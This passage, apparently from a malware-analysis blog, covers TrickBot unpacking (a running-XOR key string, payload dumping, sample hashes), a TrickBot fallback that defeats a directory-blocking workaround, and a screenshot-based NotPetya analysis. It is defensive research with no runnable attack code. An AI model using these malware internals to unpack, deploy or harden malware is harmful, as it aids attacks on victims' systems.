<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8hNe8UTmLXjB7r5HPY6lzC_kExEwD2iRgwhv4DQ7P2Yj9r6JMk9WB8eYwBtuZSLg7B6JSqiq2rkbeS-HIrWji6RBmNhMr2CInFnGjHyuTvqrW-DG6jgCL5kPpvl95OMxrMArH8nuwRoW/s1600/53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1475" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8hNe8UTmLXjB7r5HPY6lzC_kExEwD2iRgwhv4DQ7P2Yj9r6JMk9WB8eYwBtuZSLg7B6JSqiq2rkbeS-HIrWji6RBmNhMr2CInFnGjHyuTvqrW-DG6jgCL5kPpvl95OMxrMArH8nuwRoW/s640/53.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxa-ehFJXSL6EWthYyJf0aUXxj0JC571XwFn_kRjX13bxTyAqRdEjbhm45zEfbfHM3e5Q2iKHX7Sk2uOmfbZaQe6h_vVt_bdhdPiYcoRBTFY_ZlCl38KjMvhYlXZ18w8O76NhMdTH9gmG-/s1600/54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="267" data-original-width="1459" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxa-ehFJXSL6EWthYyJf0aUXxj0JC571XwFn_kRjX13bxTyAqRdEjbhm45zEfbfHM3e5Q2iKHX7Sk2uOmfbZaQe6h_vVt_bdhdPiYcoRBTFY_ZlCl38KjMvhYlXZ18w8O76NhMdTH9gmG-/s640/54.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgElu6M5ellcTl5oe7PeL9I7L3GP5kepupZRxoKwiLwn2OQplW29Gpj_1Nv1GzbOTeItnBOMcRc4a9yAbi_u-tog4woI1YNwO0mLV3lKgTHrkjHqgHUFivio7Japp_-Oqi_Y_gamoF-FJsQ/s1600/55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="93" data-original-width="975" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgElu6M5ellcTl5oe7PeL9I7L3GP5kepupZRxoKwiLwn2OQplW29Gpj_1Nv1GzbOTeItnBOMcRc4a9yAbi_u-tog4woI1YNwO0mLV3lKgTHrkjHqgHUFivio7Japp_-Oqi_Y_gamoF-FJsQ/s640/55.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3L5swNgUaCVs3tTD3nDIjO5ADZShOcLp_tHj91Qm_1gozbcrXW__mGX4b-RAle7uu4Wgs3EJbDMdJB7aSQIk2R1e9iPUvnm_VT-wqhezFSgwE_51i2OvSuDLJE0P2YkF7803wkQF6oEw/s1600/56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="47" data-original-width="513" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3L5swNgUaCVs3tTD3nDIjO5ADZShOcLp_tHj91Qm_1gozbcrXW__mGX4b-RAle7uu4Wgs3EJbDMdJB7aSQIk2R1e9iPUvnm_VT-wqhezFSgwE_51i2OvSuDLJE0P2YkF7803wkQF6oEw/s320/56.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDAX3YjY8I9xWE599_xYzmpvdW0mQ-rZeCYiQe4fC_najsZ_pWl2QjBdaaZ6_FGC6dCTRG_HCsP7WKuH59U3Ga-uLYrpMsjd3JzuFMfH72fZZXML03qBZ0zfyKIl4Q0p5YxRtoS93Jxn1l/s1600/59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="771" data-original-width="1353" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDAX3YjY8I9xWE599_xYzmpvdW0mQ-rZeCYiQe4fC_najsZ_pWl2QjBdaaZ6_FGC6dCTRG_HCsP7WKuH59U3Ga-uLYrpMsjd3JzuFMfH72fZZXML03qBZ0zfyKIl4Q0p5YxRtoS93Jxn1l/s400/59.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwlG9Utsrzk6la1oioTAelytUfW9Ru-3d75JamOzBraun582kiW3lc_psrvulqPmODCspw7OTOgp8FboIygniseWwx-K7OUzmCpMyAMTCQBt9ofXdhoRfx_c6bJlrj1_5mL4LR12cM5cn/s1600/60.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1065" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwlG9Utsrzk6la1oioTAelytUfW9Ru-3d75JamOzBraun582kiW3lc_psrvulqPmODCspw7OTOgp8FboIygniseWwx-K7OUzmCpMyAMTCQBt9ofXdhoRfx_c6bJlrj1_5mL4LR12cM5cn/s320/60.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a></div>
<div style="margin-left: 1em; margin-right: 1em; text-align: left;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-5qeNF-23Jofp5BCPn-Nx_G-_PeilmmIAFSkFP50815TgZ-7ATAqsqylBrm-vUqRVKh1XRvhkoUW77YNnKqHgMAjMbZtSkskHUsmh_xJ5Ktydtjn9p7ZxBIt-8M02l_lXwiIQ4vib1-ir/s1600/61.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-5qeNF-23Jofp5BCPn-Nx_G-_PeilmmIAFSkFP50815TgZ-7ATAqsqylBrm-vUqRVKh1XRvhkoUW77YNnKqHgMAjMbZtSkskHUsmh_xJ5Ktydtjn9p7ZxBIt-8M02l_lXwiIQ4vib1-ir/s1600/61.png" imageanchor="1" style="font-size: 11pt; margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="227" data-original-width="737" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-5qeNF-23Jofp5BCPn-Nx_G-_PeilmmIAFSkFP50815TgZ-7ATAqsqylBrm-vUqRVKh1XRvhkoUW77YNnKqHgMAjMbZtSkskHUsmh_xJ5Ktydtjn9p7ZxBIt-8M02l_lXwiIQ4vib1-ir/s320/61.png" width="320" /></a></div>
<br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
ltwo :
"<span style="background: lime; mso-highlight: lime;">zueVXBTjygBR8akj5duCwSYO1jxEfnjh</span>"
: String : Module3.PuWord</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
This is
the KEY that will be used to decrypt the payload (running XOR)</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">vbFromUnicode
: 128 : Long : Module3.PuWord</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGDM5-_PQ-GmTi7gheNnX7Ur5uMXFbOlYyOsIWeU4TRT0r3cDTfIv7oqnI30R7yR2rmITVZOY0thWjTp2N50zCk7qjYiGEAmmIQKL0IGqcsC60_u6Doo_YESwafxASBrEzUnRSoij_DXST/s1600/62.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="825" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGDM5-_PQ-GmTi7gheNnX7Ur5uMXFbOlYyOsIWeU4TRT0r3cDTfIv7oqnI30R7yR2rmITVZOY0thWjTp2N50zCk7qjYiGEAmmIQKL0IGqcsC60_u6Doo_YESwafxASBrEzUnRSoij_DXST/s320/62.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: center;">
<div style="text-align: left;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>Loop starts (running XOR):</div>
</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyRfaow9aUGj7L4Diudr7pXUkV6SwiRHQw2xIs-r267xwC0cbcrZAWHUUGncsUHMm-ig_22BfraKD9DI8GAtAF4ZfJqU3H4sLv0CzBUpgenx7qxqt9-YDqUktpjK9ZLzPXqJa8hxJvIRv_/s1600/63.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="903" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyRfaow9aUGj7L4Diudr7pXUkV6SwiRHQw2xIs-r267xwC0cbcrZAWHUUGncsUHMm-ig_22BfraKD9DI8GAtAF4ZfJqU3H4sLv0CzBUpgenx7qxqt9-YDqUktpjK9ZLzPXqJa8hxJvIRv_/s320/63.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The loop
terminates when the file is completely decrypted (end of file). At this point
the decrypted payload is dumped on the filesystem > </div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTFRVgHBnuxaG6IPmL48cpwVVD9097SkouPPaMyHVbW7Eo6DhxSByw_uioXCO4denl-b0x0xqMkmBhJ2GsJG-f0RN5pqUkyvGaT0C9cLtdfBwXTYuysukUF8kPNFKVc26yRObiya1WS6L0/s1600/64.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="71" data-original-width="1021" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTFRVgHBnuxaG6IPmL48cpwVVD9097SkouPPaMyHVbW7Eo6DhxSByw_uioXCO4denl-b0x0xqMkmBhJ2GsJG-f0RN5pqUkyvGaT0C9cLtdfBwXTYuysukUF8kPNFKVc26yRObiya1WS6L0/s640/64.png" width="640" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
This is
the actual malware - TrickBot in this case. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Enjoy and share!</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
<br />
Sample details:<br />
MD4: b71b9f3126883b6a9faa1713e3dc3339<br />
MD5: 7e0237a65a357899116d334df3de4831<br />
SHA-1: 3553f5de61c222f271546087018cc32bcafd6d5e<br />
<div>
<br /></div>
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-85671178950917798932017-07-20T22:11:00.001-07:002017-07-20T22:11:15.782-07:00TrickBot Banking Malware - some features of interest <div dir="ltr" style="text-align: left;" trbidi="on">
Here's one:<br />
<br />
It creates this dir - c:\Users\%username%\appdata\Roaming\winapp\<br />
<br />
Now - if you're thinking that creating this dir yourself and then read/write protecting it will make this malware not execute fully, you're wrong :)<br />
<br />
If it cant access that location to create the directory, it simply dumps the PE on Desktop and executes from there.<br />
<br />
Cool stuff!</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-91566485185292965782017-07-06T21:07:00.003-07:002017-07-06T21:12:18.629-07:00TrickBot Banking Trojan Configuration Files July 2017<div dir="ltr" style="text-align: left;" trbidi="on">
Posted the config files on my github - <a href="https://github.com/vithakur/TrickBot-Config-Files" target="_blank">https://github.com/vithakur/TrickBot-Config-Files</a></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-54356081138155915222017-06-28T16:55:00.001-07:002017-06-28T16:58:06.612-07:00Petya NotPetya Quick and Dirty Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
I'll leave the detailed version to hasherezade :)<br />
This is a quick look at what the malware is about and what functions it uses.<br />
<br />
Looks for physical drives on the infected computer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2I0r0TR7rfmSBEkAc6ZKjc1Fx5fARDRuWL8HtUOhv9zHziNYWbdIJXjCIZlQ3InjlrbYmzzi1phEZEgQaZDzqDoMqVkf9c46g6eZZ51u4h4ij0K9THvP40dUPwYKSehl5G7C2nPc2bFZA/s1600/1-physical+drive.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="1005" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2I0r0TR7rfmSBEkAc6ZKjc1Fx5fARDRuWL8HtUOhv9zHziNYWbdIJXjCIZlQ3InjlrbYmzzi1phEZEgQaZDzqDoMqVkf9c46g6eZZ51u4h4ij0K9THvP40dUPwYKSehl5G7C2nPc2bFZA/s400/1-physical+drive.PNG" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
Here's the bundled-in psexec, as dllhost.dat:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s1600/8-hidden-exe.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1101" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s400/8-hidden-exe.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Here's another PE, looks like used to launch the runndll32.exe as perfc.dat:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s1600/8-hidden-exe.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1101" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s400/8-hidden-exe.PNG" width="400" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s1600/8-hidden-exe.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: left;">
Infection starts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfPVUZWRKSUVjigQFWQRvluqL5OVKgjbOlgI7ydOvztVyg7LSAPsWSrZYANKaODfggsNjTbDrXc_6ceAFtiaw4UgBITVzfpS9gCvSE3EukAiS7lE6pywI59ePffFRebh6ehvShrorLCQC/s1600/dllhost-psexec-execution2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1433" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfPVUZWRKSUVjigQFWQRvluqL5OVKgjbOlgI7ydOvztVyg7LSAPsWSrZYANKaODfggsNjTbDrXc_6ceAFtiaw4UgBITVzfpS9gCvSE3EukAiS7lE6pywI59ePffFRebh6ehvShrorLCQC/s400/dllhost-psexec-execution2.PNG" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoA3KfkDwNFfpeO8nXeSEAT7Nl7bzxATNa5nIcfWNeB4L3O0fwgw1JORlF2v4JT5Nhg2Xr4YrapCQt8Vd3_9icx2s1uU2zqu0MgBnV12XXznB2BU4JOarY2WrIM9JEchKq0LQ7pvJpD4Wp/s1600/dllhost-psexec-execution.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1233" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoA3KfkDwNFfpeO8nXeSEAT7Nl7bzxATNa5nIcfWNeB4L3O0fwgw1JORlF2v4JT5Nhg2Xr4YrapCQt8Vd3_9icx2s1uU2zqu0MgBnV12XXznB2BU4JOarY2WrIM9JEchKq0LQ7pvJpD4Wp/s400/dllhost-psexec-execution.PNG" width="400" /></a></div>
<br />
dllhost.dat > PsExec<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBDxgjH4VTHejqWl_GcQYyE9PQYwDez9pfJmaK9XDm1q7IiFyRblOspUHKaglS7UkTs5xgScrggAkJA8S-2XYnLlLCHama5ZfVhhyphenhyphen-T8R7qWpYlWi0GW6M8IvkRz9GvgHuG9iL9OzvUICI/s1600/dllhost-psexec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="1435" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBDxgjH4VTHejqWl_GcQYyE9PQYwDez9pfJmaK9XDm1q7IiFyRblOspUHKaglS7UkTs5xgScrggAkJA8S-2XYnLlLCHama5ZfVhhyphenhyphen-T8R7qWpYlWi0GW6M8IvkRz9GvgHuG9iL9OzvUICI/s320/dllhost-psexec.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoYe-y1Spg57V6IpyOR0YxaW_QfN_23WyyzOG9KgUraU5Ekg7KT43KTxTSGb0XKONF07fijtXXNSvBNmiIKhxamIjStxCqUw_wWUSK9XRxSnvcOMZARL-ZXN9QYo9YiLpQeFL4GjdS9Hh/s1600/dllhost-psexec2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="795" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoYe-y1Spg57V6IpyOR0YxaW_QfN_23WyyzOG9KgUraU5Ekg7KT43KTxTSGb0XKONF07fijtXXNSvBNmiIKhxamIjStxCqUw_wWUSK9XRxSnvcOMZARL-ZXN9QYo9YiLpQeFL4GjdS9Hh/s400/dllhost-psexec2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWytL7I-so_kEeSl2AxJJMbcOgtfaXUcwsJz9FtCnWzlzIAWln3lQLqXNj3avkomwz0I5vWB_nV3UemPYwnrWksE5Ni8eJZeeXYkdQTD7k4W51nHh_NTF7PSrpCZ_velyARYd2RisAnTSH/s1600/dllhost-psexec-chart.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="759" data-original-width="633" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWytL7I-so_kEeSl2AxJJMbcOgtfaXUcwsJz9FtCnWzlzIAWln3lQLqXNj3avkomwz0I5vWB_nV3UemPYwnrWksE5Ni8eJZeeXYkdQTD7k4W51nHh_NTF7PSrpCZ_velyARYd2RisAnTSH/s400/dllhost-psexec-chart.PNG" width="332" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
System restart.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhukdvc1f9ai0leleSPhWM4L0wVWx5wqDCJrByGNVuIQLWmXiR2xEkXvwlhw4kqP-QLADjjnXQfkiOu_e2ywjcXVMvq9WmphDiToGIbTL-bs2bDEfzRhQPu_plNwKclbA8Zg8drZEGNawZJ/s1600/shu.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1429" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhukdvc1f9ai0leleSPhWM4L0wVWx5wqDCJrByGNVuIQLWmXiR2xEkXvwlhw4kqP-QLADjjnXQfkiOu_e2ywjcXVMvq9WmphDiToGIbTL-bs2bDEfzRhQPu_plNwKclbA8Zg8drZEGNawZJ/s400/shu.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Encryption.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJh3FaCg0nCodWgsDd9sopVnD4TYzGtzw-Q1uHhiRkeqQVayI5olSw2yufvnuRIAHd-n4ufLk0Y_rI7oER6vLwoCmcUiSQgPDmj-JhrJNydOnC21XOoBbJTEdv6c8q8ONXjO0ttR55OT3/s1600/2-crypt-aqcuire-context.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1091" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJh3FaCg0nCodWgsDd9sopVnD4TYzGtzw-Q1uHhiRkeqQVayI5olSw2yufvnuRIAHd-n4ufLk0Y_rI7oER6vLwoCmcUiSQgPDmj-JhrJNydOnC21XOoBbJTEdv6c8q8ONXjO0ttR55OT3/s400/2-crypt-aqcuire-context.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpPOpDcjwDSphkLSZcQjzJ0X-G2LmNKhx2Ud3YUIWemYLy-zcjkzDpim18MLwsX7ndvC4XNk0_xFkNLjUCnAp3XwkzPXuYTymeJiqjdcqUn0B_fPmwuTRjoRXToGIW0U_lBRiL8GX5dfHg/s1600/3-crypt-random.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="409" data-original-width="995" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpPOpDcjwDSphkLSZcQjzJ0X-G2LmNKhx2Ud3YUIWemYLy-zcjkzDpim18MLwsX7ndvC4XNk0_xFkNLjUCnAp3XwkzPXuYTymeJiqjdcqUn0B_fPmwuTRjoRXToGIW0U_lBRiL8GX5dfHg/s400/3-crypt-random.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLriXQJOYFNuOVQDr7_Xy4ZTTzrAXKvQxm_YW45nlMkRhHxdtNhby4SPkfkwebz0VTXJnOMXE5CU4HlPOpprYbHWUVVd3lsN9TnQqiRLKN65ko_7Tuimqi0Lo6fORGNvOtot2ow2PZHcPB/s1600/4-crypt-release.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="1287" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLriXQJOYFNuOVQDr7_Xy4ZTTzrAXKvQxm_YW45nlMkRhHxdtNhby4SPkfkwebz0VTXJnOMXE5CU4HlPOpprYbHWUVVd3lsN9TnQqiRLKN65ko_7Tuimqi0Lo6fORGNvOtot2ow2PZHcPB/s400/4-crypt-release.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
